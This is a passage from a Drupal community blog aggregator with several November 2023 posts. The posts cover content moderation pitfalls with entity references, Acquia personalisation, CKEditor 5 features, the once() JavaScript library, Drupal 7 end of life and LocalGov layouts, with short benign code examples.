    • Easy to use. Most features available after installing the module.
    • Adds and controls dialog types for operation links like Edit, Delete, etc.
    • Adds and controls dialog types for local tasks.
    • Adds and controls dialog types for local actions.
    • Ability to add dialogs via specified A tag paths.
    • Ability to add dialogs via specifying CSS selectors (classes and IDs).
    • Adds option to control delete button dialog.
    • You can add support for your modules by adding configs created in the module.
    • Experimental: Add loading spinner to form submit elements on form submit.
  • Discussion
    • The module does one thing and does it really well
    • Requires no initial configuration.
    • Worth reviewing common administration tasks for contributed modules and deciding if a modal dialog or sidebar can improve the admin UX.
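
For context, modules like this build on Drupal core’s own dialog API, which opens any link in a modal when the right class and library are attached. A minimal sketch (a hypothetical render array, not code from the module itself):

$build['edit_link'] = [
  '#type' => 'link',
  '#title' => t('Edit'),
  '#url' => \Drupal\Core\Url::fromRoute('entity.node.edit_form', ['node' => 1]),
  '#attributes' => [
    // Core intercepts links with this class and opens them in a dialog.
    'class' => ['use-ajax'],
    'data-dialog-type' => 'modal',
    'data-dialog-options' => json_encode(['width' => 700]),
  ],
  '#attached' => ['library' => ['core/drupal.dialog.ajax']],
];
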
Nov 20 2023
Nov 20

In our previous article, we went over the basics of how Drupal handles revisions and content moderation. But one of Drupal's strengths is what we call "structured content" and its ability to implement complex content models, as opposed to a big blob of HTML in a WYSIWYG field. Entities can have lots of different fields. Those fields can refer to other entities that also have lots of other fields. It is easy to establish content relationships. 

Even with Drupal websites that don't have complex content requirements, there are almost always a few entity reference fields that carry a lot on their shoulders. An article might reference other related articles. An album might reference an "artist" content type. A biography might reference an "address" content type.

And to make things easier for editors, Drupal also has tools to allow inline editing of this referenced content within the context of a parent entity. But this can lay unexpected traps. When using content moderation and revisions with structured content, there are some dangers involved that you should be aware of.

Implementation approaches for structured content

The more structured we have our content, the more responsibility we take on to make sure we implement that structured content responsibly.

We won't go over details about why structured content is preferable in modern content-rich sites and will assume you have already decided to move away from the everything-in-a-single-field as much as possible. For our purposes, “structured content” will mean a set of relationships between “components” that constitute the pieces of your content.

In Drupal, when we want to create entity relationships, there are several implementation options, each with its pros and cons. We will focus here on two of the most popular implementation approaches: Entity reference fields and Paragraphs.

Entity reference fields are probably the most common way of relating two entities together. Drupal core does that extensively. Examples of this are: when assigning Users as authors to Nodes, in file or image media fields, when using Taxonomy Terms, etc. This means that often the “components” of your content will likely be an entity of some sort, and you will probably be using entity_reference fields to put your components together.
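
As a concrete illustration, here is a minimal sketch (with hypothetical field and bundle names) of wiring such a relationship up in code, so that a “bio” node can point at a “location” node:

use Drupal\field\Entity\FieldConfig;
use Drupal\field\Entity\FieldStorageConfig;

// Field storage: an entity_reference field targeting nodes.
FieldStorageConfig::create([
  'field_name' => 'field_location',
  'entity_type' => 'node',
  'type' => 'entity_reference',
  'settings' => ['target_type' => 'node'],
])->save();

// Attach it to the "bio" bundle, restricted to "location" nodes.
FieldConfig::create([
  'field_name' => 'field_location',
  'entity_type' => 'node',
  'bundle' => 'bio',
  'label' => 'Location',
  'settings' => [
    'handler' => 'default:node',
    'handler_settings' => ['target_bundles' => ['location' => 'location']],
  ],
])->save();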

Another prevalent approach to creating structured content is the Paragraphs contributed module. The Paragraphs module lets you pre-define your components (called “paragraphs” under the hood), and by doing so, you ensure their appearance is consistent when rendered. Content editors can choose on-the-fly which paragraph types they want to use when creating the page, and you know the components will always look the same. We will get into more details about this option later.

Challenges when moderating structured content and inline editing

Consider one of the simplest and most common content modeling scenarios: a page (node) with an entity_reference field to another node. Let’s assume the main page is a “Bio” profile page, and the component we are interested in is called “Location.”

Note on implementation choices for your components: Using nodes as the data storage mechanism for components that don’t have a standalone version (page) is common but requires additional contributed modules, such as micronode, rabbit hole, etc. Other approaches and modules that don’t use nodes are equally valid, such as using core Content Blocks, the micro-content module, or even custom entities that you create in code. However, for the purposes of this example, all of these approaches are equivalent since they all use an entity-reference field to relate the host entity with the target entity (component).

By default, Drupal core doesn’t provide a great UX for inline editing. For example, the entity reference field only comes with an autocomplete widget by default, which means that when creating a Bio node, we aren’t able to finish the page unless the Location we want to use is already created.

We can add inline editing of referenced entities through different contributed modules, and Inline Entity Form and Entity Browser are the most popular solutions. If we configure Inline Entity Form, for example, we will get a node form similar to the one below: 

The whole UX could still arguably be improved, but for the sake of this example, let’s assume this is what our editors usually work with. After creating a first published version of our page, we would have something like: 

 Sometime after this page is published, the editor needs to perform a few modifications, which will require review and approval before going live. Content moderation to the rescue! They can just create a new draft, right?

 If we don’t pay close attention, everything seems to have worked as expected, since when we save the form, we see the /node/123/latest version of that page, which is a forward (unpublished) revision, and this indeed contains all changes we expect to get approved before they go live:

However, if we log out and visit the currently-published version of this page, we see that the new office location for the bio is already live. That's not what we wanted. 

We edited a draft. So how did the changes leak to the live version?

Well, it turns out that is indeed the expected behavior. Here is what happened.

When the editor clicks on the “Edit” button, they are opening the edit form of that referenced node entity. Since entity_reference fields only store information about the entity type and entity ID, the action being performed is really “let’s modify the default revision of this referenced entity, and save that as a new default revision.” This is the same as if they went to /node/45/edit and edited the location node there. Editing the referenced entity like this is almost never what you want to do in the context of using an inline form because it will:

  • Affect this (re-usable) component everywhere it is being used
  • Even if it’s not used elsewhere, in this scenario, it will change the location entity’s default revision, so the published content referencing it will reflect the changes immediately.
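
A minimal sketch of why this happens, using the hypothetical field name and the node IDs from this example:

use Drupal\node\Entity\Node;

// The Bio node's entity_reference field stores only a target ID,
// with no revision ID.
$bio = Node::load(123);
$location_id = $bio->get('field_location')->target_id; // 45

// Loading (and re-saving) the reference therefore always works against
// the *default* revision of the Location node, leaking edits to the
// live site.
$location = Node::load($location_id);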

How to mitigate or reduce the risk of this happening on your site

There is no one-size-fits-all solution for these dangers, but you can minimize the risk.

Train your editors

If your editors understand how revisions and moderation workflows work, they can more easily work around CMS limitations when necessary. For example, in this case, it might be enough just to remove the reference to that particular Location component and create a new node instead. When the main page draft is published, it will display the new node instead of the old one. Admittedly, this is not always possible or desirable in all scenarios and teams.

Avoid inline editing when moderation workflows are in place

If editors have to go to the standalone form to modify the referenced content, this might make it more visible that the changes could affect more instances than desired.

Use helper contributed modules to reduce confusion

There are modules created to help editors better understand the repercussions of their editorial changes. For example, the Entity Usage module can be configured to display a warning message in the edit form when we are altering content referenced from other places. Additionally, the Entity Reference Preview module helps editors preview unpublished content that references items that also have forward revisions.

Architect your implementation to account for the scenarios your editors will find

Maybe none of the mitigation ideas mentioned above are enough for you, or you need a more robust way to guarantee your inline edits in moderated content will be safe regardless of the editor’s skills. In this case, you might want to consider stopping the use of entity_reference fields to point to entities as components and start using the Paragraphs module instead.

What is different with Paragraphs?

The Paragraphs module still creates entities to store your components' data, but the difference is that it enforces that a given revision of the component (paragraph) is always tied to a specific revision of the host entity (parent). In fact, this is often referred to by developers as a “composite entity,” meaning the paragraph itself is only ever expected to exist “in the context of its parent.”

This solves our problem of inline editing moderated content nicely since when we create a new draft of the parent content, we will also be generating new draft revisions of all components on the page, which will always travel together through the moderation workflow.
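
Under the hood, Paragraphs does this with the entity_reference_revisions field type, which stores a revision ID alongside the target ID. A minimal sketch, assuming a hypothetical field_components field on the host node:

// Each field item pins a specific paragraph revision to this
// revision of the host entity.
$item = $node->get('field_components')->first();
$paragraph_id = $item->target_id;                   // which paragraph
$paragraph_revision_id = $item->target_revision_id; // which revision of it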

This also has some downsides you should consider when choosing your implementation model. For example, in a paragraphs scenario, your components can’t be re-used directly. You will need to create one-off versions of a given component every time you need to place it on a page. Also, depending on your content model, if you have deep nesting levels of components inside components, the UX for inline editing might be tricky. On sites with a high volume of data, this could lead to large database tables since all revisions of all components will be created independently.

Conclusion

If you have to take one thing from this read, it should be “be careful with inline editing of referenced content in entity_reference fields when using content moderation.” This is a high-risk scenario that you should discuss early in the project with all stakeholders and plan accordingly. Unfortunately, there is no one-size-fits-all solution, and you should create your Drupal architecture to best serve the use cases that matter for your site users.

Page-building strategy is a complex subject that we haven’t explored in depth here either. Layout Builder options, embedding content in WYSIWYG areas, re-usability of components, media handling, translation workflows, theming repercussions, decoupled scenarios, etc., are all topics you should have in mind when deciding on a page-building approach. Understanding how revisions, entity_reference fields, and content moderation all play together is a good start.

Lullabot has helped plan and build editorial workflows for organizations of all shapes and sizes so that Drupal helps them work toward their content goals. If you want proven help navigating these issues, contact us.

Nov 20 2023
Nov 20

For a web team, targeting the right audience is always a top priority. When it comes to broader audiences, one user may engage with a particular piece of content, while another may not.

Therefore, it is often necessary to turn to the solution of personalisation.

Acquia developed a Personalisation tool that enables teams to segment user groups, create campaigns targeted at different audiences across multiple channels, and conduct A/B tests on content, with no reliance on code beyond the setup.

Like many other higher education institutions, the University of Portsmouth (UoP) found that they attracted a student body with a wide range of interests. Therefore, they needed a personalisation solution with the following objectives:

  • The ability to substitute an existing page element with personalised content.
  • The ability to add a new component to the page for the target audience, without changing an existing component.

Making it simple

To prepare the site for personalisation, the Acquia Personalisation module had to be installed and UoP’s Drupal site connected to the personalisation platform on Acquia Cloud.

Once prepared, content can be created in Drupal following the regular workflow. Since the UoP site is component-based, this involved adding multiple components, which in turn generate the personalised site content. 

Designing a personalised experience on the Acquia personalisation platform is an intuitive and user-friendly process which requires:

  • Segmenting and defining the target audience - Determining who will view your campaign content.
  • Creating a new campaign - Indicating the URL and segment to start building the experience by adding personalisation containers. Through the provided ‘point and click’ interface, editors are able to visually select their personalisation containers.
Edit Slot
  • Assigning the replacement content - Choosing a component from the Paragraphs library to replace the original content that has been labelled as a personalisation slot.
  • Previewing and publishing the campaign.

The personalisation module operates by substituting the existing content with the desired, campaign related component on the personalisation platform. This is what enables the user to see more relevant content in comparison to the default site content.

Therefore, identifying which container needed to be targeted, as well as creating a system that allowed users to standardise this selection, was a crucial step in the process and a key factor for a successful replacement.

Zoocha tackled this by providing every component available for personalisation with a container including a personalisation-container class and a unique data-personalisation-id that could be easily found on the Acquia interface.

<article class="page__components">

  <div class="personalisation-container personalisation-container--text" data-personalisation-id="0001">…</div>

  <div class="personalisation-container personalisation-container--card-grid" data-personalisation-id="0002">…</div>

  <div class="personalisation-container personalisation-container--card-grid" data-personalisation-id="0003">…</div>

  <div class="personalisation-container personalisation-container--tabs" data-personalisation-id="0004">…</div>

</article>

The benefits of this approach were:

  • Consistent personalisation experience. Editors will be able to identify the correct container with ease anywhere on the site, based on a shared structure for all components.
  • Simple scalability. New components can be enabled for personalisation and integrated into the existing shared implementation at any point.
  • Clean HTML markup. The personalisation container is placed a level directly above the individual component templates via a preprocess (see the sketch after this list). This prevents part of the original component from remaining in the markup after the personalisation content swap, avoiding unnecessary nesting and DOM elements that may impact performance.
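
A minimal sketch of such a preprocess, assuming the components are paragraphs (this is an illustration, not Zoocha's actual implementation):

function mytheme_preprocess_paragraph(array &$variables) {
  $paragraph = $variables['paragraph'];
  // Wrap every personalisable component in a consistently named container
  // that can be targeted from the Acquia interface.
  $variables['attributes']['class'][] = 'personalisation-container';
  $variables['attributes']['class'][] = 'personalisation-container--' . $paragraph->bundle();
  $variables['attributes']['data-personalisation-id'] = $paragraph->id();
}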

A smooth process

With the implementation of the personalisation feature, we were able to provide the University of Portsmouth with a powerful tool to reach their broad audiences in a clean, easy-to-use, and scalable way.

We’re looking forward to seeing their campaigns come to life!

Personalisation Dashboard
Nov 20 2023
Nov 20

CKEditor is a powerful and versatile web-based text editor commonly used in content management systems like Drupal. It empowers content creators and editors with a user-friendly interface for crafting and formatting text, incorporating multimedia elements, and managing a wide range of content types.

CKEditor 5, the latest iteration, introduces a host of major enhancements and new features, from a fresh, modern design to advanced capabilities that streamline content creation and bring a leap forward in productivity. This new and exciting version of CKEditor comes as part of Drupal 10 out of the box, so it provides a great benefit when upgrading your current Drupal site.

In this article, we'll delve into CKEditor 5's impressive capabilities, focusing on its revamped appearance, link management, image handling, table editing, font customisation, HTML embedding, and the exciting premium features it brings to the table. Let's jump in and explore the creative possibilities CKEditor 5 offers for enhancing your digital content.

Header image - Drupal 10 blog

Drag and Drop

CKEditor 5's drag-and-drop feature transforms the content editing experience, providing unparalleled convenience for editors. This functionality allows content editors to effortlessly rearrange text, paragraphs, tables, and lists within the editor, enhancing the fluidity of content composition. The ability to move entire blocks or multiple elements with a simple drag-and-drop action offers a significant time-saving advantage, streamlining the editing process. Moreover, content editors can seamlessly import HTML or plain-text content from external sources, simplifying the integration of images into their work. This feature not only improves efficiency but also empowers editors with greater control and flexibility in crafting visually appealing and well-organised content.

Links

One area that's seen noteworthy improvements is link management. Adding links in CKEditor 5 is now more intuitive and user-friendly, as a convenient pop-up box appears within the WYSIWYG window. This makes the process smoother and faster. These link options can be combined with Drupal’s 'Editor Advanced Link' module, which empowers content creators with the ability to fine-tune their links. With this module, editors can define attributes such as title, CSS classes, IDs, link targets, 'rel' attributes, and ARIA labels, which are essential for providing users of assistive technology, such as screen readers, with meaningful information about the purpose or content of the link. 

These enhancements offer a wealth of customisation options for links, whether it's for accessibility, branding, or precise styling. CKEditor 5 and the 'Editor Advanced Link' module together bring a logical link management experience to Drupal, making the process more efficient and versatile.

Links

Image Handling

Adding images to your content using CKEditor 5 has been given an upgrade thanks to the new drag-and-drop functionality. Users can simply select an image, whether it's from their device or a webpage, and simply drag and drop it into the WYSIWYG window. Once the image is incorporated, you have the option to designate it as decorative (meaning it doesn't add information to the page and, therefore, does not require alt text) or provide the alt text.

Furthermore, you can fine-tune the image presentation by adjusting its alignment and text wrapping options, all conveniently accessible from the image-dedicated balloon toolbar. If you wish to enrich your image with a link or a caption, you can easily achieve this without leaving the image toolbar.

Drupal blog image 2

Links

When you're ready to adjust the image size, CKEditor 5 simplifies the process by allowing you to resize the image directly within the WYSIWYG window. A straightforward corner selection and drag operation lets you customise the image to your desired dimensions.

Moreover, CKEditor 5 integrates with Drupal media. Once the necessary modules are enabled, you'll discover a new button in the text editor toolbar configuration. Add this button to your active toolbar, specify the media types and view modes you want to make available, and save your preferences. You can then conveniently add new media files or select from your media library, following the standard workflow you're accustomed to (you are restricted from resizing the image when using the library). CKEditor 5, along with its compatibility with Drupal media, enhances the image management experience, making it a user-friendly and efficient process.

Table Management

Enhancements to table management in CKEditor 5 bring an improved editor experience. While this currently requires adding a patch via Composer, the effort is undoubtedly worthwhile for those who frequently utilise tables in their content.

You can specify the number of columns and rows and include an optional title for the table. Once your table is set up, a wide array of editing options becomes available, providing greater flexibility and control over table and cell properties. These edits encompass essential functionalities, such as adding or removing columns and rows, merging and splitting cells, and customising styles for both the entire table and individual cells. You can fine-tune text alignment and even introduce background colours to enhance the visual appeal of your tables.

CKEditor 5 also offers the capability to nest tables within the cells of other tables, providing a versatile tool for crafting intricate charts or layouts based on table structures. This feature allows content creators to format the nested table with the same ease and flexibility as a standalone table, enhancing the possibilities for designing complex and well-organised content layouts.

Table Management

These improvements in CKEditor 5 make working with tables more efficient and user-friendly, empowering content creators to present their data and content in a structured and visually appealing manner.

Font Handling

Modify fonts in your content with CKEditor 5. By installing the 'CKEditor Font Size and Family' module, you can unlock a wide range of font and text editing options right on the WYSIWYG screen. With just a few simple configuration tweaks within the text editor, editors gain the ability to not only adjust font sizes and families but also apply text colours and text background colours, enhancing the text's visual appeal and customisation possibilities.

Font Handling

Other Exciting Extensions for CKEditor 5 to Explore

Auto Save

The Autosave feature is a significant enhancement. It automatically saves your data, sending it to the server when necessary, ensuring that your content is safe, even if you forget to hit 'Save.' While it does require installation and some code, the peace of mind it offers is well worth the setup time.

Markdown

With the Markdown plugin, you can switch from the default HTML output to Markdown. This is fantastic for those who prefer a lightweight, developer-friendly formatting syntax. The best part? It's available right out of the box, making content creation more flexible and efficient.

To-Do Lists

CKEditor 5's To-do list feature is a handy addition to your content creation toolkit. It enables you to create interactive checkboxes with labels, supporting all the features of bulleted and numbered lists. You can even nest to-do lists with other list types for a versatile task management experience. While it does require installation, the organisational benefits it brings are worth the minor setup work.

Premium Features

Unleash CKEditor 5's premium features with ease. Install and enable the 'CKEditor 5 Premium Features' module, configure it by adding your licence key, and adjust your text editor's toolbar. Then, you're ready to explore the exceptional features, including track changes, comments, revision history, and real-time collaboration, which enhance collaborative editing, discussions, version control, and harmonious teamwork, streamlining content creation and review for improved efficiency and precision.

Track Changes 

The Track Changes feature brings a dynamic experience to document editing. It automatically marks and suggests changes as you make them. Users can quickly switch to the track changes mode, where all edits generate suggestions that can be reviewed, accepted, discarded, or commented on, enhancing the collaborative editing process.

Revision History

The Revision History feature can be your trusted document versioning companion. It empowers you to manage content development over time with ease. Unlike Drupal's default revision log feature, the preview mode offers a comprehensive view of content changes and the contributors behind them, all within the editor. Users can compare and restore previous document versions.

Comments

With the Comments feature, users can annotate specific sections of content, whether it's text or block elements like images. It facilitates threaded discussions and provides the flexibility to remove comments once discussions are concluded, fostering effective collaboration and feedback.

Real-Time Collaboration

Real-Time Collaboration enables multiple authors to work concurrently on the same rich text document. Additionally, it provides a user presence list, offering a live view of active participants in the document. While other collaboration features can be used asynchronously, real-time collaboration allows for instantaneous teamwork.

Import Word/Export Word and PDF

When installed, the module allows for the easy importing and exporting of the above formats. While the export functionality is fully stable in CKEditor, the converters are considered experimental for Drupal at this time. The import of .docx and .dotx files will retain the formatting, comments, and even tracked changes. 

Notification System

Alongside these collaboration features, CKEditor will be introducing a new notification system to keep editors and writers well-informed about the content's status. Stay up-to-date with real-time notifications, ensuring a smoother editorial workflow.

Productivity Pack

The Productivity Pack is a bundle of Premium features which make document editing faster, easier, and more efficient.


The Productivity Pack features include:

  • Templates allow you to create and insert predefined content structures into the editor, saving time and ensuring consistency in the content display.

  • Slash Commands lets you execute actions using the / key as well as create your own custom actions. This can help to streamline content creation, reducing navigation through the editor options and saving time.

  • Document Outline adds an automatic outline of the document headings in a sidebar to help navigate the document.

  • Table of contents inserts a linked table of contents into the document, which automatically updates as headings are added and will be retained in the editor output data.

  • Format Painter copies text formatting and styles and applies it to a different part of the content. This helps to ensure consistent formatting across the content, saves editor time and contributes to a more professional appearance.

  • Paste from Office Enhanced provides error-free copy-pasting from MS Word and Excel. Formatted text, complex tables, media, and layouts are retained – turning MS Office content into clean HTML.

The module also provides a Full-screen plugin that maximises the editing area, which is very useful when using premium features such as Comments and Document Outline, as they take up extra space around the editor.

Demos of these CKEditor 5 features are available from links within the module project page. There are many other non-premium and premium features that can be installed outside of the Drupal module with some developer involvement, which can be found here.

Conclusion 

In this article, we've explored CKEditor 5's significant enhancements for content creators and editors in Drupal 10. CKEditor 5 offers improved link management, effortless image handling, streamlined table editing, versatile font customisation, and simplified HTML embedding. We've also touched on exciting extensions that enhance your content creation process.

Furthermore, CKEditor 5's premium features, like Track Changes, Revision History, Comments, Real-Time Collaboration, Import/Export for Word and PDF, Notification System, and the Productivity Pack, bring advanced capabilities for collaborative editing and efficient content creation.

As you dive into CKEditor 5's features, we encourage you to explore further and experience the benefits firsthand. It's a game-changer for content editing and collaboration in Drupal 10. Unleash your creativity and discover a more efficient and professional content editing experience with CKEditor 5.

Nov 17 2023
Nov 17

Once is a Drupal library - available on npm - that ensures your JavaScript runs only once on any given element.

I put a snippet on a Slack channel recently suggesting that someone should use once() to make sure their code didn't run multiple times. And then I gave them this snippet to show how to use it:

const editFrequencys = once('allEditFrequencies', '.edit-frequency', context);

editFrequencys.forEach(editFrequency => {
  // once() returns plain DOM elements, so use addEventListener rather than jQuery's .on().
  editFrequency.addEventListener('change', function() {
    $.ajax({
      method: "POST",
      url: "/frequency-select",
      data: { name: "John", location: "Boston" },
      dataType: "json"
    })
      .done(function( data ) {
        console.log("It's done!");
        console.log(data);
      });
  });
});

Job well done, Mark, you might say. Yes, but then the author asked me:

What are the different arguments about in the first line?
I've seen this code in searching for an answer, but nothing ever explains what/why the arguments for the "once" are for.

And that reminded me of a younger me. Me about 6 months ago, when I first tried to use once(). So here is the explanation I gave them:

const editFrequencys creates a variable for what you want to work on. It’s a plural, because once always returns an array. You could do something like const [editFrequency] to just return one item if you were sure there was only ever going to be one of the thing you are looking for on the page. But I find it better to return the array just in case in the future a second instance of the thing is on the page.

once() is the function that will ensure the code that is acting on your “thing” will only act once.

'allEditFrequencies' is a name that we assign to this item. You can assign anything to it basically, such as 'justSomeStuff'. This is then attached to the property in your DOM via a data attribute, such as data-once="allEditFrequencies" so JS knows which once function this item belongs to.

context is just the scope that will be searched to build your array. You could use document here, but in Drupal, behaviors are re-run when parts of the page get updated via Ajax, and they receive just the updated fragment as their context, so in Drupal terms, passing context through is probably better.
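Putting it all together, here's a minimal sketch of how that snippet might sit inside a Drupal behavior (assuming the once library and Drupal's behaviors system are loaded, with the Ajax call trimmed down to a comment):

(function (Drupal, once) {
  Drupal.behaviors.editFrequency = {
    attach(context) {
      // once() returns only the .edit-frequency elements inside context that
      // haven't been processed yet, and tags them with
      // data-once="allEditFrequencies" so they're skipped on later passes.
      once('allEditFrequencies', '.edit-frequency', context).forEach((editFrequency) => {
        editFrequency.addEventListener('change', () => {
          // React to the change here, e.g. the $.ajax call from the snippet above.
        });
      });
    },
  };
})(Drupal, once);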

If I got something wrong there, or there's something I should update, let me know.

Share (please)

Filed Under:

  1. Drupal
  2. Drupal Planet
Nov 16 2023
Nov 16

Host Matt Kleve assembles a crack team of Lullabot experts from various company departments to share their hands-on experiences and insights into how innovative technology influences and enhances our field.

We discuss integrating AI into coding, design, and tasks like writing emails and RFP responses, along with the broader implications for the future of web development.

Join us as we navigate the complexities, challenges, and vast potential of Generative AI in shaping our world.

Nov 15 2023
Nov 15

That’s a question we sometimes ask clients or people we meet at Drupal events. 

It’s a rhetorical question, of course. The answer is always at least “10.” 

There’s rarely any need to expound upon the pivotal role that websites play in the current climate.

For higher education, websites represent make-or-break first, second, and third impressions, and much more. 

County and municipal government websites now function as a virtual town square – the place for taking care of official business, showcasing major attractions, appealing to tourists, supporting business, and a whole host of other functions.

For enterprises and nonprofits, the required heavy lifting runs equally deep and wide.

That’s why many of us in the Drupal Community are puzzled about the significant percentage of Drupal sites that are still on Drupal 7.

Is Legacy Technology Up to the Task?

If you are reading this blog, chances are that you get it: Drupal 7 is legacy technology. For others in your organization, though, who don’t know the chasm that exists between Drupal 7 and the possibilities inherent in Drupal 10, a Drupal 7 site might seem just fine.

We can (and will) cover the big differences between Drupal 7 and 10, but first, for the sake of perspective, let’s look back a dozen years to some of the technologies that were exciting and considered leading edge in 2011 – the year that Drupal 7 was released.

  • The iPhone 4s, which represented a significant advancement over previous models, was unveiled on October 4, 2011. 
  • That same year, the BlackBerry Bold 9900 had become quite coveted for its physical keyboard and secure messaging capabilities.

2011 tech

  • Samsung Galaxy S2 was the flagship Android smartphone in 2011.
  • The Nintendo 3DS handheld gaming console featured autostereoscopic 3D technology, and was viewed as innovative in 2011.
  • Sony Walkman MP3 Players were still popular in 2011.
  • Compact camcorders such as the Flip series, were viewed as extremely impressive for the capabilities that were contained within such a small size.
  • Netbooks were popular in 2011 – soon to be eclipsed by more powerful and versatile Ultrabooks and tablets.
  • Compact digital cameras were still widely used in 2011.
  • Finally, standalone GPS navigation devices, such as the Garmin, were viewed as sophisticated devices for people who could afford this level of technology in 2011. They were far more prevalent than GPS-enabled smartphone apps. 

Kicking off a year of exciting technological advances, Drupal 7 was released on January 5, 2011, and gained popularity for its flexibility and extensive contributed module ecosystem.  

Unlike subsequent versions of the CMS, Drupal 7 was accessible to hobbyists and small website owners. Drupal 8 marked a new evolutionary trajectory – away from hobbyist-friendly and toward a uniquely enterprise-ready CMS, distinctly suited for ambitious sites with complex content models.

Impending Drupal 7 End of Life

Drupal 7 was originally slated for end of life in 2021 – six years after the 2015 release of Drupal 8. That first end-of-life date was initially extended by one year in the midst of upheavals and uncertainties surrounding a global pandemic.

As Drupal Community migrations to Drupal 8 and then 9 proved to be more of a trickle than the required surge, the end-of-life date was extended again to 2023. A final Drupal 7 end-of-life date of January 5, 2025 was announced in June of 2023 at DrupalCon Pittsburgh. To review: end of life means no more bug fixes or security patches, along with an increased risk of faulty modules.

Drupal 7 Disintegrating

Dropoff in Drupal 7 Community Support

It’s critical for anyone who is still on a Drupal 7 site to realize that even though the official end-of-life date is not until 2025, community support is already on the decline. 

The Drupal Association announced that effective August 1, 2023, the Drupal Security Team may choose not to post moderately critical and less critical issues affecting Drupal 7 in the public issue queue for resolution. When a security issue affects both Drupal 7 and Drupal 10, the Drupal 10 security advisory may be released without a corresponding Drupal 7 fix.

Additionally: 

  • Drupal 7 branches of unsupported modules and themes are no longer eligible for new maintainership. 
  • The Drupal security team will not issue security advisories for any unsupported libraries that Drupal 7 contributed modules or themes rely on, such as CKEditor 4.
  • PHP 5.5 and below will no longer be supported on Drupal 7.
  • Security fixes will no longer be provided for Drupal 7 Windows-only issues. Anyone running a Drupal 7 site on Windows is advised to look into migrating to another operating system for hosting.

Why Are So Many Websites Still on Drupal 7?

There’s no denying that a Drupal 7 migration is a big lift, requiring a fresh, new build that consumes budget and resources. An ROI analysis does not need to dig exceptionally deep, however, to conclude that upgrading to a more scalable, secure, efficient, and feature-rich web platform is worth the investment many times over.

Promet Source is a certified Drupal migration partner.

Multiple factors determine the actual cost of a Drupal 7 to 10 migration. Migrating a simple brochure site with a few pages and basic functionality can be a simple and streamlined process. Degree of customization and complex data structures will considerably compound the cost.

In many cases, a Drupal 7 site represents more than a decade of complex customization and a comfort zone that stakeholders can be hesitant to let go of. Leveling up requires a bit of letting go. Experienced and adept migration partners understand this important factor and have the skills to navigate clients through the planning process with the assurance that migrated functionalities will make it to the other side and onto a CMS that’s inherently more flexible and stable.

It’s helpful to note that a significant number of contributed modules have been ported to Drupal 10 and most of the popular ones have been integrated into Drupal core. While some modules have been deprecated, any Drupal 7 integration or custom modules can be rebuilt for Drupal 10.

Drupal 10 architecture vastly simplifies integrations and data exchange with third-party applications. 

It’s been our experience that the biggest barrier to migration from Drupal 7 is simply a lack of understanding concerning the speed, usability, power and potential of Drupal 10.

This lack of understanding, combined with inertia, can fuel an "if it's not broken, don't fix it" level of complacency for Drupal 7 sites that have not experienced major issues.

What are the Advantages of Drupal 10 vs. Drupal 7? 

Drupal 10 is simply better. For Drupal website stakeholders who are clear that their website is an essential strategic and operational driver for every aspect of their organization, it’s important to maintain a sharp focus on the Drupal 10 difference while helping to bring others in the organization on board. Here are some essential advantages of Drupal 10:

  • Improved Performance. Drupal 10 is designed to offer better performance and scalability compared to Drupal 7. It has enhancements in terms of speed, caching, and optimization, which can lead to a more responsive and faster website.
  • Mobile Responsiveness. Drupal 10 has improved support for responsive web design and mobile devices out of the box. Drupal 7 may require additional modules and custom development to achieve the same level of mobile friendliness.
  • Better Content Editing Experience. Drupal 10 offers improved content editing capabilities, with the integration of the Layout Builder into core, making it easier for non-technical users to create and edit content layouts. Drupal 10 also provides an easier-to-use WYSIWYG editor and more streamlined content management tools compared to Drupal 7’s more basic content editing interface.
  • Accessibility. Drupal 10 places a stronger emphasis on web accessibility, making it easier to create websites that are compliant with accessibility standards. While accessibility features can be retrofitted into Drupal 7 sites, there is a significant level of assurance that comes from knowing that accessibility is built in.
  • Developer Friendly. Drupal 10 offers a more robust and developer-friendly architecture, with support for modern PHP versions, improved APIs, and easier integration with other technologies.
  • Modern and Flexible Theming Options. Drupal 10 leverages the Twig templating engine to provide more flexibility and modern theming options. Drupal 7 uses PHP templates for theming.
  • Extensible Architecture. Drupal 10 offers a flexible and extensible architecture with improved APIs, making it easier for developers to create custom functionality and integrate with third-party systems.
  • Configuration Management. Drupal 7 lacked a robust configuration management system, making it more challenging to export and import site configurations. Drupal 10 has a comprehensive configuration management system, allowing for easier-to-manage configuration changes across different environments.
  • Multilingual Capabilities. Drupal 10’s enhanced multilingual support makes it easier to create websites in multiple languages. Drupal 7 also supports multiple languages but lacks many of Drupal 10’s advanced features.
  • Decoupled Architecture. Drupal 10 better supports decoupled or headless architecture, enabling the use of Drupal as a backend with various front-end technologies, such as React, Vue.js, or Angular. Drupal 7’s support for decoupled setups is limited.
  • Progress toward Automatic Updates. Drupal sites have traditionally required manual upgrading. The Drupal Automatic Updates Initiative is designed to allow for built-in security fixes and upgrades. Progress toward automatic updates is moving forward at a steady clip. 

Latest stats show that 47.5 percent of all Drupal sites are still on Drupal 7. While there’s reason to believe that a significant percentage of them are hobbyists or small businesses, the fact is, if you are still on Drupal 7, you are not alone. But if you agree that your website is a mission-critical digital property, and that remaining on Drupal 7 beyond the end of life is a sub-optimal option, let’s talk.

Nov 15 2023
Nov 15

There's a (hidden away) module in LocalGov Drupal that's a game-changer for layout possibilities.

The LocalGov Drupal Layouts module was created as part of the LGD Microsites platform, but contributed back to the core LGD project. However, it is not turned on by default (todo: propose it gets turned on by default), so I think a lot of people are not aware of it.

Here's a short demo of how to enable it and use it. Then you can extend it to add as many layout options as you want to your LGD layouts.

If you'd like to chat about how you might use this, connect with me on the LGD slack or via the Annertech contact form.

Nov 15 2023
Nov 15

Introduction

This article narrates some of the things that we, at Axelerant, practice consciously to make our workplace inclusive for women team members.

Things that got us the title of India’s Best Workplace For Women™ by Great Place To Work® Institute (India).

Something like what Performance Coach Nanditha Krishnan shared about her joining experience at Axelerant.

“I’m a woman who got hired here at fifty years of age, right in the midst of COVID-19. This breaks a lot of stereotypes.” 

I’m not a woman. And I won’t pretend to know what it feels like to be one.

That’s why, the words that matter, come directly from women team members at Axelerant.

So Yeah, We Got The Award

Every year, hundreds of organizations from multiple industries vie against each other to be called a "great" workplace.

According to the 2023 Great Place To Work (GPTW) report, “At Best Workplaces, women make up an impressive 36% of the workforce, notably 17% higher.”

Companies can win this award in different categories, too.

They recognized Axelerant in three of them.

GPTW categories won by Axelerant

How Was Axelerant Judged For This Award?

The process is straightforward.

You fill up a form about all the systems and practices in place that ensure a great workplace culture in your organization and submit it to GPTW.

They read the responses, then survey each team member. Anonymously.

And there’s also a bit where they call team members randomly and ask about their responses.

So the chances of lies creeping into the responses are pretty low. 

